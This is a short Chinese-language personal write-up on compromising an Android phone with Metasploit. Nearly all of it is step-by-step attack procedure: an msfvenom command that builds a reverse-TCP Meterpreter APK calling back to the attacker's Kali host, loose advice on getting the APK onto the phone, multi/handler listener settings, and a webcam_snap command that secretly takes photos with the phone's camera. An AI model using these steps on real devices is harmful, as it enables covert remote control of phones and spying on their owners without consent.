简单记录自己利用meterpreter入侵安卓机
需要准备
- 一台安卓机
- 安装kali Linux系统
入侵流程
-
kali终端执行
msfvenom -p android/meterpreter/reverse_tcp lhost=(kali linux的IP地址) lport=5555 R>/root/a.apk
可以看到在root目录下生成了a.apk文件 -
将apk文件发送到安卓手机(方式自行选择,此处可扩展)
-
手机安装apk,为了测试成功,还需根据测试目的授予相应权限
-
kali linux 打开工具metasploit framework输入
use exploit/multi/handler
-
接着设置一系列参数
set payload android/meterpreter/reverse_tcp
-
set LHOST kali机IP地址
-
set LPORT 5555
-
exploit
-
在安卓机启动apk安装的软件,当出现以下代表监听成功
-
接着执行
webcam_snap
,可以看到,图片被保存在根目录下(注意:执行命令时要一直点击手机apk软件的图标,否则获取不了照片)